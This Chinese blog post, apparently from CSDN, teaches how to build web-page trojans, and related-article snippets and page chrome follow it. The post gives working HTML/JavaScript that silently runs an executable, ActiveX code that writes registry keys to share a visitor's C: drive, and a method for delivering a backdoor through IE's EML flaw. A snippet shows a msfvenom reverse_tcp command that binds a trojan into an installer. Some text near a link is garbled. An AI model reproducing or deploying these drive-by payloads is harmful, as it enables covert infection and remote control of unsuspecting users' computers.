教你如何制作网页木马

简单的安卓木马制作(实现外网控制) 前言: 要实现外网控制肯定需要一个外网的IP负责监听,没有的小伙伴推荐使用https://www.ngrok.cc。 其端口映射功能十分好用。具体使用程见其官网。 注:如攻击机为虚拟机,最好在桥接模式 1.隧道协议TCP,设置好远程端口和本地端口 2.复制隧道ID,在kali里启动终端 3.启动成功,复制域名、端口 4.生成木马 5.获得控制权 6.下个照片看看 7.还能拍照(不过要权限),help命令可以查看所有功能,不一一赘述 ... 阅读详情
大家对木马都不陌生了,它可能要算是计算机病毒史上最厉害的了,相信会使木马的人千千万万,但是有很多人苦于怎么把木马发给对方,现在随着计算机的普及,在网络上我相信很少有人会再轻易的接收对方的文件了,所以网页木马诞生了。
1.它应该算是html带动同路径下的一个exe的文件的主页了,也就是当浏览器浏览这个页面的时候,一个exe的文件就在后台自动下载并执行了,可以做一个test.html的文件在桌面,内容如下:
<script language="javascript">
run_exe="<OBJECT ID=/"RUNIT/" WIDTH=0 HEIGHT=0 TYPE=/"application/x-oleobject/""
run_exe+="CODEBASE=/"test.exe#version=1,1,1,1/">"
run_exe+="<PARAM NAME=/"_Version/" value=/"65536/">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
再在桌面下随便找个exe的文件,名字一定要改为tset.exe,好了,这时候双击我们刚才生成的html文件,当看到“网页加载中,请稍后....”的时候,我们的那个同路径下的exe文件也被无条件执行了,这种页面的优点就是编译修改简单,但是!当你申请下了一个个人主页空间的时候,把这两个文件上传上去的时候,当你试图通过浏览器浏览你的杰作的时候,ie的安全警告跳了出来,我想没有几个人愿意乖乖的冒着风险去点“是”,好了,尽管这个网页木马在本地是多么的完美,但是放到了网上就通不过ie的安全策略了,这个小马失败了。
2.是通过ie自身的漏洞写入注册表,相信很多人经常在浏览一些主页的时候,注册表被改的乱七八糟、ie标题被改、首页被改、注册表编辑器被禁用等等,这些都是自动修改了你的注册表的网页的杰作,所以我门也可以做个页面让浏览者的硬盘完全共享,也是做个html的文件,内容如下:
script language=javascript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Flags",402,"REG_DWORD");
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Type",0,"REG_DWORD"
);
Shl.RegWrite ("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan//RWC$//Path","C://");
}
function init()
{
setTimeout("f()", 1000);
}
init();
</script>
当对方的浏览过这个页面的时候,他的c:就被共享了,共享后的进入方法嘛..呵呵不用说了吧,但是他虽然被共巷了,但是你还不知道谁正在看你的这个页面,他的ip又是多少你都不知道,没有关系,有个很简单的方法,去163申请一个域名的转换,如:http://dhj.126.com连接目标地址里...褪枪蚕砹恿恕?/a>
这种网页木马的特点是比较安全,不宜被对方发现,但是使用麻烦需要牵扯到很多的东西。

3.也是现在最好用的一种了吧,个人认为。它是将一个小巧的exe文件作成一个.eml的文件,再用ie的漏洞让一个html的页面执行这个.eml的文件,你的那个小巧的exe文件就被执行了,由于代码过长又因每个exe文件转换后的代码不同所以不可能一一写出,下面给出一个地址http://dhj.126.com实际上就是一个转...憧梢酝ü齮elnet x.x.x.x 3389来完全控制对方(这个5k的小后门是winshell5.0黑白网络有下,同时这个winshell5.0还有一个很出色的功能,就是能下载一个你事先设置好的指定路径下的一个文件,并执行他,我放置的是网络深偷,如果你的杀毒软件够厉害的话,神偷是可以被查出来的,这里只是实验,实际中可以指定很多查不到的小马,这里不阐述),有兴趣的朋友可以来试试。
这种网页木马的特点是,对方挨种率较高,除了制作麻烦一点外,没有什么缺点啦
好了所有的漏洞都是建立在系统漏洞的前提下,多升级多打补丁没有坏处
 

Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=1804019

 
木马的攻击与防御(MSF) MSF简介 Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。它集成了以下4个模块: exploits模块 漏洞攻击模块列表,入侵式 命名规则 模块/系统/服务/名称 payloads模块 漏洞负载模块与exploits模块配合使用的用于入侵后的操作 auxiliary模块 辅助模块,通常用于没有攻击荷载的漏洞攻击。 encoders模块 编码器模块,用于msfvenom -e or 阅读详情

相关推荐

网页嵌入式木马之我所见

几天前我中了一个木马,当时我很纳闷,我第一没有收过邮件,第二没有收过朋友从QQ里传来的文件,为什么我会中木马呢?于是查了一下有关资料,才发现网页也有嵌入的可能。究其原因,这是因为微软公司的在2000年发布的MIME/BASE64处理漏洞所引起的,不过这个漏洞只适用于IE5.5以下的版本的浏览器。那么MIME是什么呢?其实MIME是Multimedia Internet Mail Extension

2788

木马如何生成--简易木马制作,从零基础到精通,收藏这篇就够了!

如果有兴趣的还可以继续研究,如何给自己的木马免杀,研究下各个厂商的杀毒软件对于特征的侧重检查,如果你也想自己制作一个木马来研究学习,可以私信我,因为程序比较敏感和代码量合起来长达200多行也不好直接贴在下面。而我们要制作一个简易木马,追求的是方便,肯定是通过高级语言来写,站在巨人的肩膀可以帮我们省力很多,这里我使用python语言。很久没写了,没有什么好的灵感写内容。这两周花了点时间研究海康威视的使用和构成,机缘巧合也是拿下了整栋科技楼的监控和开门权限,收获还是挺大的,但因为涉及敏感没有撰文。

leah126的博客 2277

网页木马挂马的实现与防范

网页木马挂马的实现与防范

qq_43678263的博客 2947

电脑木马制作加利用

一分钟你学会如何制作木马并且利用进行对攻击目标截图 开启摄像头 获取命令行等等...

pbh9950的博客 612

web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细学(3)

getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型及图片高度与宽度。的知识,比如我们平时在进行文件上传时,在我们上传文件后,网站会对图片进行二次处理(格式、尺寸、保存、删除要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片(标准化)并放到网站对应的标签进行显示。

ranzi. 7799

msf工具之木马程序制作以及伪装

本文转自行云博客https://www.xy586.top 文章目录捆绑木马RAR自动解压 捆绑木马 使用msfvenom制作木马程序: #生成木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200912111442.

qq_41679358的博客 9221

“灰鸽子”网页木马从原理、制作到防范

如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎 么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一 些不怀好意者精心制作网页木马。  以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMV

[木子]的专栏 3235

各种网页木马挂马的代码

1、嵌入网页 以下是引用片段:  2、PHP网页挂马 以下是引用片段:   3、图片木马 以下是引用片段:   4、邮件木马 以下是引用片段:    5、flash木马 http://网页木马地址 插入木马地址 width=10 height=10", "GET" 宽度和高度,方式 后面的照添,更改木马地址就可以了。 6、做123.JS文件木马 以下是引用片段

jahn的专栏 3101

邮件网页木马

大家肯定对网页<a onclick="javascript:tagshow(event, %C4%BE%C2%ED);" href="javascript:;" target="_self">木马已经很熟悉了,但大家可能对邮件网页木马还不是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我一直未见网上及杂志上有此方面的内容。这里我就以技术共享的原则跟大家谈谈邮件

blackbean的专栏 1860

网页木马是怎么制作

我只知道5944空间木马制作方法 先申请一个FTP空间,然后用木马生成器生成一个木马,然后放在FTP里面(一定要免杀),然后记住这个FTP地址再加你木马名称,先复制起来,再下载个网马生成器,在网马生成器里面输入你刚才复制的地址,然后生成,生成出来的网页文件再复制到你刚才放木马的地址里面,一定要在同一个目录,然后就可以了,地址就是你FTP的地址加你网马的名称ftp://xxxx.xxxx/xxx.

靡不有初,鲜克有终 1772

网页木马

当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,反查杀手段不断升级,新的病毒层出不穷,形式也越来越多样化,为了躲避查杀,病毒自身的隐蔽性越来越高,针对反病毒软件对传统的病毒传播途径的监控能力提高,造成病毒传播困难的问题,越来越多的病毒,利用多数反病毒软件产品对恶意脚本监控能力的缺陷,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播

言出必行 4035

制作图片木马

 何谓BMP网页木马?它和过去早就用臭了的MIME头漏洞的木马不同,MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件,放到网页上利用IE和OE的编码漏洞实现自动下载和执行。  然而BMP木马就不同,它把一个EXE文件伪装成一个BMP图片文件,欺骗IE自动下载,再利用网页中的JAVASCRIPT脚本查找客户端的Internet临时文件夹,找到下载后的BMP文件

zhdd1234的专栏 2428

木马文件总结

文章目录木马-理论基础木马的植入方式远控木马的通信方式1.正向连接2.反向连接3.通信协议1. 图片马简单说明制作方法DVWA下图片马的利用Low Security LevelMedium Security Level2.msfvenom生成PDF马2.1 原理漏洞描述2.2 木马文件利用2.3 PDF文件利用2.4 PDF链接利用3.Cobalt Strike生成office宏木马3.1 引诱用户打开office宏3.2 使用CS生成office宏木马文件3.3 将宏payload添加至office文件3

个人博客 5916

打造完美的IE网页木马

(测试页面:http://www.godog.y365.com/runexe/icyfox.htm,此处所运行的程序不是木马!)   既然要打造完美的IE网页木马,首先就必须给我们的完美制定一个标准,我个人认为一个完美的IE网页木马至少应具备下列四项特征:   一:可以躲过杀毒软件的追杀;   二:可以避开网络防火墙的报警;   三:能够适用于多数的WINDOWS操作系统(主要包括WIN98、WI

zhcool(碳元素)的专栏 1669

信息安全实验五 之 计算机病毒与黑客实验脚本【恶意网页病毒演示&病毒制作&木马捆绑】

信息安全实验五 之 计算机病毒与黑客实验脚本【恶意网页病毒演示&病毒制作&木马捆绑】 一、脚本及恶意网页病毒演示实验 1、创建文件 2、拷贝文件 3、删除文件 4、修改文件 二、病毒详解及批处理病毒制作 关机bat脚本 最简单的蓝屏炸弹文件 扩展名病毒 三、木马捆绑模拟实验 叮嘟!这里是小啊呜的学习课程资料整理。好记性不如烂笔头,今天也是努力进步的一天。一起加油进阶吧!

小啊呜的博客 7313
上一篇: 社会工程学入侵实战技术分析(图)
下一篇: 黑客如何给你的系统种上木马
edison20
博客等级 码龄19年 59粉丝 108原创
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值